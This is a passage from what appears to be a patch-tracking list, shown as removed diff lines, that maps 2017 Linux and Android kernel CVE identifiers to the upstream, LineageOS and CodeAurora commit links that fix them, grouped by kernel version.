-	Link - https://android.googlesource.com/kernel/msm/+/98f7c17df33355e78417e6bb2395f810a903bb64
-CVE-2017-11091
-	Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/10b0cb47e92abe52c5372ded0fe80a5a5f18586f
-CVE-2017-11092
-	Link - https://android.googlesource.com/kernel/msm/+/d78717de292b114f388e900e3e7947ae44630982
-CVE-2017-11093
-	Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/072d53b2ca00ac57ca4e0ebe2315b431256cf786
-CVE-2017-11600
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_common/commit/0af5440977299a17a0f226ce00d872572a426c14
-	Link - 3.10 - https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec.git/commit/?id=7bab09631c2a303f87a7eb7e3d69e888673b9b7e
-CVE-2017-12146
-	Link - 3.16+ - https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/driver-core.git/commit/?h=driver-core-next&id=6265539776a0810b7ce6398c27866ddb9c6bd154
-CVE-2017-12153
-	Link - 3.2-^3.16 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.2.94&id=082d8a6a55d2b6583d9e93ac9796efdf4c412658
-CVE-2017-13080
-	Link - https://github.com/torvalds/linux/commit/fdf7cb4185b60c68e1a75e61691c4afdc15dea0e
-	Link - https://github.com/LineageOS/android_kernel_oneplus_msm8974/commit/39fb5459ecd16779e75d76827fb32d15a995f469.patch
-CVE-2017-13080-Extra
-	Depends
-	Link - https://github.com/LineageOS/android_kernel_lge_hammerhead/commit/6fef7504fdb639dea2fbc0cbbd10963953f443da
-	Link - https://github.com/LineageOS/android_kernel_lge_hammerhead/commit/a9803a869bfc274d57ab33862ad7a5ea31df4559
-	Link - https://github.com/LineageOS/android_kernel_lge_hammerhead/commit/dc0c59d66b8679dc870c9aa568647d0be71501b7
-	Link - https://github.com/LineageOS/android_kernel_lge_hammerhead/commit/706ccb5adc54e349c491ebeb462c121d6467c863
-CVE-2017-15265
-	Link - ^4.14 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.18.76&id=035e6d0b5b192ff5e168ed322304d29db108d790
-CVE-2017-2618
-	Link - 3.10 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.10.107&id=a71b4196a72f09ed223d8140de7fd47ccdaf6e2b
-CVE-2017-2636
-	Link - ^4.10 - https://git.kernel.org/cgit/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=82f2341c94d270421f383641b7cd670e474db56b
-CVE-2017-2671
-	Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/net/ipv4/ping.c?id=43a6684519ab0a6c52024b5e25322476cabad893
-CVE-2017-5546
-	Link - 4.7-^4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c4e490cf148e85ead0d1b1c2caaba833f1d5b29f
-CVE-2017-5547
-	Link - 4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6d104af38b570d37aa32a5803b04c354f8ed513d
-CVE-2017-5550
-	Link - 4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b9dc6f65bc5e232d1c05fe34b5daadc7e8bbf1fb
-CVE-2017-5551
-	Link - 3.14-^4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=497de07d89c1410d76a15bec2bb41f24a2a89f31
-CVE-2017-5669
-	Link - ^4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=95e91b831f87ac8e1f8ed50c14d709089b4e01b8
-CVE-2017-5897
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=7892032cfe67f4bde6fc2ee967e45a8fbaf33756
-CVE-2017-5967
-	Link - 3.10 - https://review.lineageos.org/163292
-	Link - 3.18 - https://review.lineageos.org/170669
-	Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/commit/?id=dfb4357da6ddbdf57d583ba64361c9d792b0e0b1
-CVE-2017-5970
-	Link - ^4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=34b2cef20f19c87999fff3da4071e66937db9644
-CVE-2017-5972
-	Link - https://github.com/android/kernel_msm/commit/e994b2f0fb9229aeff5eea9541320bd7b2ca8714
-	Link - https://review.lineageos.org/#/c/181001/
-CVE-2017-5986
-	Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2dcab598484185dea7ec22219c76dcdd59e3cb90
-CVE-2017-6001
-	Link - 3.2-3.4 - http://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?h=linux-3.2.y&id=9eb0e01be831d0f37ea6278a92c32424141f55fb
-	Link - ^4.9 - https://android-review.googlesource.com/#/c/438399/
-CVE-2017-6074
-	Link - ^4.9 - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4
-CVE-2017-6214
-	Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ccf7abb93af09ad0868ae9033d1ca8108bdaec82
-CVE-2017-6274
-	Link - 3.18 - https://android.googlesource.com/kernel/tegra/+/0f08eca74276e7ebab4b712d98970c6425207ccc
-CVE-2017-6275
-	Link - 3.18 - https://android.googlesource.com/kernel/tegra/+/0f08eca74276e7ebab4b712d98970c6425207ccc
-CVE-2017-6345
-	Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8b74d439e1697110c5e5c600643e823eb1dd0762
-CVE-2017-6346
-	Link - 3.18 - https://android.googlesource.com/kernel/common/+/be671c7e17454b4f144a8e05268a6071748a8791%5E%21/#F0
-	Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=d199fab63c11998a602205f7ee7ff7c05c97164b
-CVE-2017-6347
-	Link - ^4.10 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ca4ef4574f1ee5252e2cd365f8f5d5bafd048f32
-CVE-2017-6348
-	Link - ^4.9 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4c03b862b12f980456f9de92db6d508a4999b788
-CVE-2017-6353
-	Link - ^4.10 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=dfcb9f4f99f1e9a49e43398a7bfbf56927544af1
-CVE-2017-6421
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=be42c7ff1f0396484882451fd18f47144c8f1b6b
-CVE-2017-6423
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=0f264f812b61884390b432fdad081a3e995ba768
-CVE-2017-6424
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=8cac3c4aac106b917e60e7aa7d4c4189e376913c
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=5cc2ac840e36a3342c5194c20b314f0bb95ef7e1
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=4e44b25b26a594aa818
-CVE-2017-6425
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=ef86560a21fe1f256f6ba772a195201ff202c657
-CVE-2017-6426
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=80decd6365deec08c35ecb902a58f9210599b39a
-CVE-2017-6874
-	Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=040757f738e13caaa9c5078bca79aa97e11dde88
-CVE-2017-6951
-	Link - ^3.14 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=44d6e10f77095133e3882529a16b686b2305e6b0
-CVE-2017-7184
-	Depends
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=677e806da4d916052585301785d847c3b3e6186a
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f843ee6dd019bcece3e74e76ad9df0155655d0df
-CVE-2017-7187
-	Depends
-	Link - 3.4 - https://review.lineageos.org/#/c/182338/
-	Link - 3.4 - https://review.lineageos.org/#/c/182339/
-	Link - 3.4 - https://review.lineageos.org/#/c/182340/
-	Link - 3.10 - https://review.lineageos.org/#/c/175571/
-	Link - 3.10 - https://review.lineageos.org/#/c/175572/
-	Link - 3.10 - https://review.lineageos.org/#/c/175573/
-#	Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/mkp/scsi.git/commit/?h=4.11/scsi-fixes&id=bf33f87dd04c371ea33feb821b60d63d754e3124
-CVE-2017-7277
-	Depends
-	Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4ef1b2869447411ad3ef91ad7d4891a83c1a509a
-	Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8605330aac5a5785630aec8f64378a54891937cc
-CVE-2017-7308
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2b6867c2ce76c596676bec7d2d525af525fdc6e2
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8f8d28e4d6d815a391285e121c3a53a0b6cb9e7b
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bcc5364bdcfe131e6379363f089e7b4108d35b70
-CVE-2017-7364
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=3ce6c47d2142fcd2c4c1181afe08630aaae5a267
-CVE-2017-7366
-	Depends
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=f4c9ffd6cd7960265f38e285ac43cbecf2459e45
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=7c4d5736d32f91f0cafe6cd86d00e26389970b00
-CVE-2017-7368
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=143ef972be1621458930ea3fc1def5ebce7b0c5d
-CVE-2017-7369
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=75ed08a822cf378ffed0d2f177d06555bd77a006
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=ae8f1d5f60644983aba7fbab469d0e542a187c6e
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=05f4374845738d2146075e77d9139e60a558de18
-CVE-2017-7370
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=970edf007fbe64b094437541a42477d653802d85
-CVE-2017-7371
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9d5a0bc7f6318821fddf9fc0ac9a05e58bb00a6b
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=e02e63b8014f7a0a5ea17a5196fb4ef1283fd1fd
-CVE-2017-7372
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=1806be003731d6d4be55e5b940d14ab772839e13
-CVE-2017-7373
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/linux-next/akpm&id=eac4a77bb71750b02e91508b15c9aaf4fe2b94ae
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=e5eb0d3aa6fe62ee437a2269a1802b1a72f61b75
-CVE-2017-7374
-	Link - 4.2-4.10 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=1b53cf9815bb4744958d41f3795d5d5a1d365e2d
-CVE-2017-7472
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=6efda2501976288f10895834ba2782d0df093441
-CVE-2017-7487
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ee0d8d8482345ff97a75a7d747efc309f13b0d80
-CVE-2017-7495
-	Depends
-	Link - 3.18 - https://review.lineageos.org/#/c/175288
-	Link - 3.18 - https://review.lineageos.org/#/c/175289
-	Link - ^4.6 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=06bd3c36a733ac27962fea7d6f47168841376824
-CVE-2017-7541
-	Link - ^4.12 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8f44c9a41386729fea410e688959ddaa9d51be7c
-	Link - 3.10 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.10.108&id=7136ca73ff3496758b56f60b6fe76d675e69cd21
-CVE-2017-7616
-	Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cf01fb9985e8deb25ccf0ea54d916b8871ae0e62
-CVE-2017-7618
-	Link - 3.0 - https://github.com/fourkbomb/linux/commits/4a0d9b8d06893c56c7e66fcf8d91ef67770cf9ef
-	Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=c2798145e731005fa1e6ee2a489940c1dd8f03e4
-CVE-2017-7889
-	Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a4866aa812518ed1a37d8ea0c881dc946409de94
-CVE-2017-7979
-	Link - ^4.11 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e0535ce58b92d7baf0b33284a6c4f8f0338f943e
-CVE-2017-8233
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=64b7bc25e019dd07e8042e0a6ec6dc6a1dd0c385
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=8b0cb658b568e4b160a5b57fb3cef0063aff56d9
-CVE-2017-8234
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=6266f954a52641f550ef71653ea83c80bdd083be
-CVE-2017-8235
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=7e4424a1b5f6a6536066cca7aac2c3a23fd39f6f
-CVE-2017-8236
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=8a079632f447be9fd86f92b8e02b1940a26c8a2a
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=cf0d31bc3b04cf2db7737d36b11a5bf50af0c1db
-CVE-2017-8237
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=342d16ac6fb01e304ec75344c693257e00628ecf
-CVE-2017-8239
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=01db0e012f86b8ba6974e5cb9905261a552a0610
-CVE-2017-8240
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=22b8b6608174c1308208d5bc6c143f4998744547
-CVE-2017-8241
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=90213394b7efb28fa511b2eaebc1343ae3b54724
-CVE-2017-8242
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=6a3b8afdf97e77c0b64005b23fa6d32025d922e5
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=364643660e49ec22f657d3e624bee2c7b9738d98
-CVE-2017-8243
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=cae0d5a6f32e52e06c0841bb7142452062dc2ac8
-CVE-2017-8244
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=f51b0f3b9da62e96b0167a3eb3376fca39fc7baf
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=01673e148223c10782b03c5485aff2a82b1900c4
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=fe3bdd12315656347d1bca82d920b3df1a2b0e8a
-CVE-2017-8245
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=ececf97911515114030bef1fc6df630dbb706f17
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=f53af3805879292423465cd0877cc7a75131ce10
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=5b2f6e011ba92f28e8d7dbeb11c4ee7344c33186
-CVE-2017-8246
-	Link - 3.4 - https://review.lineageos.org/#/c/185429/
-	Link - 3.4 - https://review.lineageos.org/#/c/185430/
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=578eb74435eccdc3df516fd744941a7d872fac6c
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=30baaec8afb05abf9f794c631ad944838d498ab8
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=9734b72ae21eca557540c3c42d356dd131a20004
-CVE-2017-8247
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=84f8c42e5d848b1d04f49d253f98296e8c2280b9
-CVE-2017-8250
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9be5b16de622c2426408425e3df29e945cd21d37
-CVE-2017-8251
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=3a42f1b79ed696f29350f170c00f27712ae84a36
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=771254edea3486535453dbb76d090cd6bcf92af9
-CVE-2017-8253
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=a5f07894058c4198f61e533d727b343c5be879b0
-CVE-2017-8254
-	Link - 3.4 - https://review.lineageos.org/#/c/188837/
-	Link - 3.4 - https://review.lineageos.org/#/c/188838/
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=70afce1d9be745005c48fd565c01ce452a565e7e
-CVE-2017-8256
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=75e1e00d6b3cd4cb89fd5314a60c333aa0b03230
-CVE-2017-8257
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=0f19fbd00c6679bbc524f7a6d0fc3d54cfd1c9ae
-CVE-2017-8258
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=31e2a2f0f2f3615cefd4400c707709bbc3e26170
-CVE-2017-8259
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=68020103af00280393da10039b968c95d68e526c
-CVE-2017-8260
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=52a2a62a5b0e9dd917bcd9a6d86d674833cc91b7
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=8f236391e5187c05f7f4b937856944be0af7aaa5
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=7b7534d96813ffe502271b0b3fae0d0d12e3e05b
-CVE-2017-8261
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=2a2f0b7463f4de9ca225769204ff62c71760709c
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=8576feebaf688dadf0548b9a16d2b90b76ed714c
-CVE-2017-8262
-	Link - 3.10 - https://android.googlesource.com/kernel/msm/+/6e95883e47953902ff6a5125a12cf83aa0a7de69
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=20c8f1c393ec2726ac46642ae8883643f2427c4f
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=9ef4ee8e3dfaf4e796bda781826851deebbd89bd
-CVE-2017-8263
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=2a2f0b7463f4de9ca225769204ff62c71760709c
-CVE-2017-8264
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=4268b75208ca04bc63dcfadbb9a1eca8e964a697
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?h=LA.UM.5.5.r1-05100-8x96.0&id=53c6b89349730765a71722d274fc3fa41287d21f
-CVE-2017-8265
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=193813a21453ccc7fb6b04bedf881a6feaaa015f
-CVE-2017-8266
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=aa23820b001ab1cfb86b79014e9fc44cd2be9ece
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=42627c94cf8c189332a6f5bfdd465ea662777911
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=64e4e29356928bea60ae4be5b387eb7d8d7a7f45
-CVE-2017-8267
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=2a2f0b7463f4de9ca225769204ff62c71760709c
-CVE-2017-8268
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=5f3b68da4c8f6474df2497b6d912465d640904b8
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=fab64410d005a7dee8ed02557a0ca26e4c5242ff
-CVE-2017-8269
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=b925d9f76164475abb6f6a557327095156c9b249
-CVE-2017-8270
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=ff96565f1dbabfeb7fb2c1604f40af768579d9df
-CVE-2017-8272
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=a8cb976e7c8f25191728b655e0b38328a6d7d81f
-CVE-2017-8277
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=c9a6f09f1030cec591df837622cb54bbb2d24ddc
-CVE-2017-8279
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=f09aee50c2ee6b79d94cb42eafc82413968b15cb
-CVE-2017-8280
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=49b9a02eaaeb0b70608c6fbcadff7d83833b9614
-CVE-2017-8281
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9be5b16de622c2426408425e3df29e945cd21d37
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=9b209c4552779edb86221787fb8681dd212e3a0c
-CVE-2017-8890
-	Link - 3.4 - https://review.lineageos.org/#/c/173325/
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/1853870b216d3446efd39190a8ff0006c54dfd46
-	Link - ^4.11 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=657831ffc38e30092a2d5f03d385d710eb88b09a
-CVE-2017-9074
-	Depends
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=linux-3.2.y&id=ad8a4d9d3f255a783d534a47d4b4ac611bb291d8
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=linux-3.2.y&id=f7c2d2d7ebf9a110cafbe53199457c318f61a192
-	Link - ^4.11 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2423496af35d94a87156b063ea5cedffc10a70a1
-CVE-2017-9075
-	Link - ^4.11 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=fdcee2cbb8438702ea1b328fb6e0ac5e9a40c7f8
-CVE-2017-9076
-	Link - ^4.11 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=83eaddab4378db256d00d295bda6ca997cd13a52
-CVE-2017-9077
-	Link - ^4.11 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=83eaddab4378db256d00d295bda6ca997cd13a52
-CVE-2017-9150
-	Link - ^4.11 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0d0e57697f162da4aa218b5feafe614fb666db07
-CVE-2017-9242
-	Link - ^4.11 - https://github.com/torvalds/linux/commit/232cd35d0804cc241eb887bb8d4d9b3b9881c64a
-CVE-2017-9676
-	Link - 3.0+ - https://github.com/LineageOS/android_kernel_motorola_msm8960-common/commit/d109d8d7e2998a635406215a559e298fa7ef4bb8
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=c1f749639030305a3b02185c180240a8195fb715
-CVE-2017-9677
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=b62291edb424281ed31a4e15140b16972ce9eef1
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=dc333eb1c31b5bdd2b6375d7cb890086d8f27d8b
-CVE-2017-9678
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/420d0dc1b4563880f962002e8cb21e733bf074eb
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=ad8e758d30164290a71d9c59fbf7854029556a3e
-CVE-2017-9679
-	Link - https://github.com/android/kernel_msm/commit/31f54e33d88c676bedb64127b5ae0c60d06f9518
-CVE-2017-9680
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=dcd0a696c33dd3ab824151833d787f3ff90abbba
-CVE-2017-9682
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/cd821a40b76919b0815a9a7c09d0f6cf1f15a7ee
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=1c4ddc4c7a4fcdf9371048ce01a6b0e5d2a2bae9
-CVE-2017-9684
-	Link - https://github.com/android/kernel_msm/commit/d3d636627c8bb57a64bfadcc5d282c35d152f563
-	Link - https://github.com/android/kernel_msm/commit/83cf9f50cda5ab3f99055242bebbcb26d96319ad
-	Link - https://github.com/android/kernel_msm/commit/b2fa897c8e86362946ec524ed47300164a33453d
-CVE-2017-9686
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=de875dd095d3ec0906c77518d28f793e6c69a9da
-CVE-2017-9687
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/34cff2eb2adc663de32ca682b57551c50c9253c6
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=8f1a77f5da53edd2b5a1c42ddd766712a90109d6
-CVE-2017-9690
-	Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/b59b67fbd2f1d4f71e7a4f9e6723f04b717efc74
-CVE-2017-9691
-	Depends
-	Link - https://github.com/android/kernel_msm/commit/869bd2cd3d6c17826b6f162e0d721174224b867a
-	Link - https://github.com/android/kernel_msm/commit/04468bc1d72f15e6b8f19014e8c6203038dd6b23
-CVE-2017-9692
-	Link - https://github.com/android/kernel_msm/commit/7a86f369594a0b6567820b77d441e778e6adb8a7
-CVE-2017-9693
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=05a5abb21e4d97001f77d344444a3ec2f9c275f9
-CVE-2017-9694
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=1e47d44de7bab5500d27f17ae5c4ebebc7d2b4ef
-CVE-2017-9696
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/8b44a684139301fa31548e8120b7e6299965572a
-CVE-2017-9697
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/4b788ca419ec37e4cdb421fef9edc208a491ce30
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=7e45e3a6c1f6dd46d71fb6824a7cf702d2e79225
-CVE-2017-9702
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/2ae1eab54e874553c078e5275421398597401ac9
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/c46b2ecd901a12867d0dd91ae019f4b7256bcfec
-CVE-2017-9706
-	Link - https://github.com/android/kernel_msm/commit/7489a0a8f68d0f018d0f9df5df157bb20f83b05e
-CVE-2017-9714
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=aae237dfbaf8edcf310eeb84b887b20e7e9c0ff3
-CVE-2017-9715
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=58350a7bcb827c0ac81f0750a62d5c5a8ed3a469
-CVE-2017-9717
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=bf7486fb6d82fb9ad02e303b6fdf4061cfc0375d
-CVE-2017-9719
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a491499c3490999555b7ccf8ad1a7d6455625807
